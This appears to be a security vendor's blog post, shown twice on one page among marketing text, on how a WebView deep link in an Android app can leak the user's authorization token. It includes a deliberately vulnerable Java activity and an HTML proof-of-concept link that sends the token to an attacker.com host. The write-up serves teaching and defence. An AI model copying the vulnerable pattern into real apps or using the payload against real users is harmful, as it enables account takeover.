🚀 CloudSEK has raised $19M Series B1 Round – Powering the Future of Predictive Cybersecurity
Read More
Ensure the safety and integrity of your mobile applications with CloudSEK BeVigil Enterprise Mobile App Scanner module.
Schedule a DemoWebView is a simple but powerful way to present web-based content in Android. It is used as a dedicated web browser instance of an application that can deliver web pages to users. WebView was first released as a part of Android 4.4. Since Android 5.0, it is included as a system application.
WebView vulnerabilities that allow threat actors to:
We will use the following AndroidManifest.xml file to understand how threat actors can exploit WebView
<activity android:name=”.DeeplinkActivity”>
<intent-filter> <action android:name=”android.intent.action.VIEW” /> <category android:name=”android.intent.category.DEFAULT” /> <data android:scheme=”myapp” android:host=”deeplink” /> </intent-filter> </activity> |
---|
Let’s assume that this file can process WebView deep links:
public class DeeplinkActivity extends Activity {
protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); handleDeeplink(getIntent()); } private void handleDeeplink(Intent intent) { Uri deeplink = intent.getData(); if (“/webview”.equals(deeplink.getPath())) { String url = deeplink.getQueryParameter(“url”); handleWebViewDeeplink(url); } } private void handleWebViewDeeplink(String url) { WebView webView = …; setupWebView(webView); webView.loadUrl(url, getAuthHeaders()); } private Map<String, String> getAuthHeaders() { Map<String, String> headers = new HashMap<>(); headers.put(“Authorization”, getUserToken()); return headers; } } |
---|
In this case an attacker can carry out a remote attack to obtain the user’s authentication token by creating a page with the following code:
<html>
<body style=”text-align: center;”> <h1><a href=”myapp://deeplink/webview?url=https://attacker.com/“>Click Me!</a></h1> </body></html> |
---|
When the victim clicks on the “click me” button, the vulnerable app will open https://attacker[.]com, in the WebView, along with the authorization header. The attacker can use the stolen authentication tokens to gain full access to the victim’s account.
Discover how CloudSEK's comprehensive takedown services protect your brand from online threats.
How to bypass CAPTCHAs easily using Python and other methods
What is shadow IT and how do you manage shadow IT risks associated with remote work?
Take action now
CloudSEK Platform is a no-code platform that powers our products with predictive threat analytic capabilities.
Digital Risk Protection platform which gives Initial Attack Vector Protection for employees and customers.
Software and Supply chain Monitoring providing Initial Attack Vector Protection for Software Supply Chain risks.
Creates a blueprint of an organization's external attack surface including the core infrastructure and the software components.
Instant Security Score for any Android Mobile App on your phone. Search for any app to get an instant risk score.
min read
How Threat Actors are Exploiting Android Webview
WebView is a simple but powerful way to present web-based content in Android. It is used as a dedicated web browser instance of an application that can deliver web pages to users. WebView was first released as a part of Android 4.4. Since Android 5.0, it is included as a system application.
WebView vulnerabilities that allow threat actors to:
We will use the following AndroidManifest.xml file to understand how threat actors can exploit WebView
<activity android:name=”.DeeplinkActivity”>
<intent-filter> <action android:name=”android.intent.action.VIEW” /> <category android:name=”android.intent.category.DEFAULT” /> <data android:scheme=”myapp” android:host=”deeplink” /> </intent-filter> </activity> |
---|
Let’s assume that this file can process WebView deep links:
public class DeeplinkActivity extends Activity {
protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); handleDeeplink(getIntent()); } private void handleDeeplink(Intent intent) { Uri deeplink = intent.getData(); if (“/webview”.equals(deeplink.getPath())) { String url = deeplink.getQueryParameter(“url”); handleWebViewDeeplink(url); } } private void handleWebViewDeeplink(String url) { WebView webView = …; setupWebView(webView); webView.loadUrl(url, getAuthHeaders()); } private Map<String, String> getAuthHeaders() { Map<String, String> headers = new HashMap<>(); headers.put(“Authorization”, getUserToken()); return headers; } } |
---|
In this case an attacker can carry out a remote attack to obtain the user’s authentication token by creating a page with the following code:
<html>
<body style=”text-align: center;”> <h1><a href=”myapp://deeplink/webview?url=https://attacker.com/“>Click Me!</a></h1> </body></html> |
---|
When the victim clicks on the “click me” button, the vulnerable app will open https://attacker[.]com, in the WebView, along with the authorization header. The attacker can use the stolen authentication tokens to gain full access to the victim’s account.